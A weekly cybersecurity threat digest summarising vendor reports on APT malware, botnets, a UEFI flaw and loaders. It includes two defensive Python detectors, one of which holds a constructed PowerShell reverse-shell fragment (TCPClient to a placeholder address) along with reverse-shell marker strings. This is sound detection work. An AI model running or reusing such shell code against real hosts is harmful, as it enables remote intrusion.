Welcome to the weekly digest about the Cybersecurity & Threats in the wild. Below you will find a very subjective summary of Cybersecurity events for the prior week.
1. ANDROID MALWARE IN DONOT APT OPERATIONS by @CyfirmaR
- Indian APT that serves Indian national interests
- designed for intelligence gathering against internal threats
- abuses a legitimate customer engagement platform for malicious purposes
https://www.cyfirma.com/research/android-malware-in-donot-apt-operations/
2. IoT Botnet Linked to Large-scale DDoS Attacks Since the End of 2024 by @TrendMicro
- since the end of 2024, large-scale DDoS attacks have targeted companies in Japan, issued from the command-and-control (C&C) servers of an IoT botnet that has been attacking various countries globally
- botnet comprises malware variants derived from Mirai & Bashlite and infects IoT devices by exploiting vulns and weak creds
- supported commands include various DDoS attack methods, malware updates, and enabling proxy services
- primary devices used in the botnet were wireless routers and IP cameras from well-known brands
https://www.trendmicro.com/en_us/research/25/a/iot-botnet-linked-to-ddos-attacks.html
3. Investigating A Web Shell Intrusion With Trend Micro™ Managed XDR by @TrendMicro
- endpoint sensors detected the Internet Information Services (IIS) worker process (w3wp.exe) executing suspicious activity
- attacker was able to upload a web shell to the IIS worker, which, at the time of the attack, was unrestricted
- attacker utilized an encoded PowerShell command to create a reverse TCP shell that connected to an IP address for command-and-control
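The chain described in item 3 (IIS worker process spawning an encoded PowerShell command) is easy to hunt for in process-creation telemetry. The script below is an added example for this digest, not code from Trend Micro or the report: it takes constructed `parent|image|command_line` events (real sensors such as Sysmon Event ID 1 carry the same three fields under other names), flags any shell spawned by `w3wp.exe`, decodes the `-EncodedCommand` payload (base64 over UTF-16LE) and raises the severity when the decoded script contains the building blocks of a TCP reverse shell. The marker list and the sample events are assumptions constructed for the example.

```python
"""Flag shells and encoded PowerShell launched by the IIS worker process (w3wp.exe).

Added example, not the report's code. Input format (constructed):
"parent_image|image|command_line", one process-creation event per line.
"""
import base64
from typing import Dict, List, Optional

# Shells that an IIS worker process has no business spawning in normal operation.
SHELL_CHILDREN = ("cmd.exe", "powershell.exe", "pwsh.exe")

# Strings a PowerShell reverse TCP shell typically needs; any match in the
# decoded script escalates the finding. (Assumed marker list for the example.)
REVERSE_SHELL_MARKERS = (
    "System.Net.Sockets.TCPClient",
    "GetStream(",
    "Invoke-Expression",
    "iex ",
)


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if there is none.

    PowerShell encodes the script as UTF-16LE and then base64, and accepts any
    unambiguous prefix of the flag name (-e, -ec, -enc, -EncodedCommand ...).
    A simple whitespace split is enough here because base64 contains no spaces.
    """
    tokens = command_line.split()
    for i, tok in enumerate(tokens[:-1]):
        name = tok.lower().lstrip("-/")
        if tok.startswith(("-", "/")) and name and "encodedcommand".startswith(name):
            try:
                raw = base64.b64decode(tokens[i + 1], validate=True)
                return raw.decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None  # flag present but payload is not valid encoded PowerShell
    return None


def analyze_event(line: str) -> Optional[Dict[str, str]]:
    """Score one 'parent|image|cmdline' event; None means nothing to report."""
    parent, image, cmdline = line.split("|", 2)
    if parent.lower().rsplit("\\", 1)[-1] != "w3wp.exe":
        return None  # only children of the IIS worker are in scope
    child = image.lower().rsplit("\\", 1)[-1]
    if child not in SHELL_CHILDREN:
        return None
    decoded = decode_encoded_command(cmdline)
    if decoded is None:
        return {"severity": "medium", "reason": f"w3wp.exe spawned {child}", "decoded": ""}
    hits = [m for m in REVERSE_SHELL_MARKERS if m.lower() in decoded.lower()]
    reason = "encoded PowerShell spawned by w3wp.exe"
    if hits:
        reason += "; reverse-shell markers: " + ", ".join(hits)
    return {"severity": "high" if hits else "medium", "reason": reason, "decoded": decoded}


def scan(lines: List[str]) -> List[Dict[str, str]]:
    """Run analyze_event over a batch of events and keep the findings."""
    return [r for r in (analyze_event(l) for l in lines if l.strip()) if r]


# Constructed sample payload: a non-functional fragment that only shows the
# TCPClient/GetStream pattern the detector looks for. TEST-NET address used.
_SAMPLE_SCRIPT = "$c = New-Object System.Net.Sockets.TCPClient('203.0.113.5', 4444); $s = $c.GetStream()"
_SAMPLE_B64 = base64.b64encode(_SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [  # all constructed for this example
    r"C:\Windows\explorer.exe|C:\Windows\System32\notepad.exe|notepad.exe C:\notes.txt",
    r"C:\Windows\System32\inetsrv\w3wp.exe|C:\Windows\System32\cmd.exe|cmd.exe /c whoami",
    r"C:\Windows\System32\inetsrv\w3wp.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|"
    "powershell.exe -nop -w hidden -enc " + _SAMPLE_B64,
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding["severity"].upper(), finding["reason"])
        if finding["decoded"]:
            print("  decoded:", finding["decoded"])
```

Running the block prints one medium finding (the `cmd.exe /c whoami` child) and one high finding with the decoded script; the plain notepad event is ignored. Decoding the payload before matching matters because the base64 hides every indicator from a naive string search on the command line.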
4. Under the cloak of UEFI Secure Boot: Introducing CVE-2024-7344 by @ESETresearch
- vulnerability allows execution of untrusted code during system boot, enabling deployment of malicious UEFI bootkits
- all UEFI systems with Microsoft third-party UEFI signing enabled are affected
- issue was fixed by affected vendors and old, vulnerable binaries were revoked by Microsoft on Jan 14th, 2025
5. One Step Ahead in Cyber Hide-and-Seek: Automating Malicious Infrastructure Discovery With Graph Neural Networks by #PaloAlto’s #Unit42
- using a network crawler that leverages relationships among domains, they discovered network artifacts around known indicators and trained a graph neural network (GNN) to detect additional malicious domains
https://unit42.paloaltonetworks.com/graph-neural-networks
6. MintsLoader: StealC and BOINC Delivery by @esthreat
- ongoing campaign involving MintsLoader delivering second-stage payloads like StealC and the Berkeley Open Infrastructure for Network Computing (BOINC) client
- PowerShell-based malware loader that has been seen delivered via spam emails with a link to Kongtuke/ClickFix pages or a JScript file
- features a Domain Generation Algorithm (DGA) with a seed value based on the addition of the current day of the month and a constant, combined with anti-VM techniques to evade sandboxes and malware researchers
https://www.esentire.com/blog/mintsloader-stealc-and-boinc-delivery
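A seed built from the day of the month plus a constant, as item 6 describes, has a useful weakness for defenders: there are only 31 possible seeds per constant, so once the constant and the derivation are recovered from a sample, every domain the loader can ever produce can be precomputed, and the same domains recur on the same day of every month. The script below is an added example for this digest, not eSentire's code and not MintsLoader's real algorithm; only the seed scheme comes from the write-up. The constant, the `hypothetical_derive` function that turns a seed into domains, the TLD and the DNS log format are all stand-ins constructed here.

```python
"""Precompute a blocklist for a DGA seeded with (day of month + constant).

Added example, not eSentire's code. The seed scheme is from the write-up;
the constant, the seed-to-domain derivation and the log format are made up.
"""
import hashlib
from typing import Callable, Dict, List


def seed_for(day_of_month: int, constant: int) -> int:
    """Seed as described in the write-up: day of month (1..31) plus a constant."""
    if not 1 <= day_of_month <= 31:
        raise ValueError("day of month must be 1..31")
    return day_of_month + constant


def hypothetical_derive(seed: int, count: int = 3, tld: str = "top") -> List[str]:
    """Stand-in derivation (assumption, not the real one): hash the seed and
    slice label text from the digest. Any deterministic function works the same
    way for the argument below."""
    domains = []
    for i in range(count):
        digest = hashlib.sha256(f"{seed}:{i}".encode()).hexdigest()
        domains.append(f"{digest[:12]}.{tld}")
    return domains


def precompute_blocklist(constant: int, derive: Callable[[int], List[str]]) -> Dict[str, int]:
    """Map every domain the scheme can produce to the day of month it is used.

    Because the seed depends only on the day of the month, 31 seeds exhaust the
    whole space for a given constant, and day N of next month reuses day N's set.
    """
    blocklist: Dict[str, int] = {}
    for day in range(1, 32):
        for domain in derive(seed_for(day, constant)):
            blocklist[domain] = day
    return blocklist


def match_dns_logs(lines: List[str], blocklist: Dict[str, int]) -> List[str]:
    """Return log lines whose queried name is in the blocklist.

    Constructed log format: 'timestamp client qname' separated by whitespace.
    """
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) >= 3 and parts[2].lower().rstrip(".") in blocklist:
            hits.append(line)
    return hits


CONSTANT = 0x1A2B  # assumed value; a real one would be recovered from a sample
BLOCKLIST = precompute_blocklist(CONSTANT, hypothetical_derive)

SAMPLE_DNS_LOG = [  # constructed for this example
    "2025-01-17T09:12:01Z 10.0.0.15 www.example.com",
    f"2025-01-17T09:12:07Z 10.0.0.15 {hypothetical_derive(seed_for(17, CONSTANT))[1]}",
    "2025-01-17T09:13:44Z 10.0.0.22 updates.example.net",
]

if __name__ == "__main__":
    print(f"{len(BLOCKLIST)} domains cover every day of the month for this constant")
    for hit in match_dns_logs(SAMPLE_DNS_LOG, BLOCKLIST):
        print("DGA hit (day", BLOCKLIST[hit.split()[2]], "):", hit)
```

With three domains per seed the whole blocklist is 93 entries, small enough to push into a resolver or proxy denylist for the entire month rather than regenerating it daily. The day recorded beside each domain also tells an analyst which day's infrastructure a sighting belongs to.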
7. Deep Dive Into a Linux Rootkit Malware by #FORTIGUARD LABS
- follow-up analysis of how remote attackers exploited multiple vulnerabilities in an appliance to gain control of a customer’s system
https://www.fortinet.com/blog/threat-research/deep-dive-into-a-linux-rootkit-malware
8. Massive FortiGate Config Leak: Assessing the Impact by @censysio
- a new hacker group leaked full Fortinet FortiGate firewall configs, including plaintext creds, for over 15k devices, from a compromise dating back to 2022
- as of January 17, of the 15.4k distinct compromised hosts, over half are still online and reachable in scans, and 32.88% are still exposing their FortiGate web login interfaces
https://censys.com/fortigate-config-leak-impact
9. Lazarus APT: Techniques for Hunting Contagious Interview by @ValidinLLC
- using the ClickFix social engineering technique to trick job seekers into copying and pasting malicious code onto their devices during fake video job interviews (“Contagious Interview”)
- shows how to expand and pivot from threat intelligence using Validin to detect likely-related infrastructure and mitigate this threat
https://www.validin.com/blog/inoculating_contagious_interview_with_validin
Thank you for reading.
Please add interesting items you came across during the week in the comments below.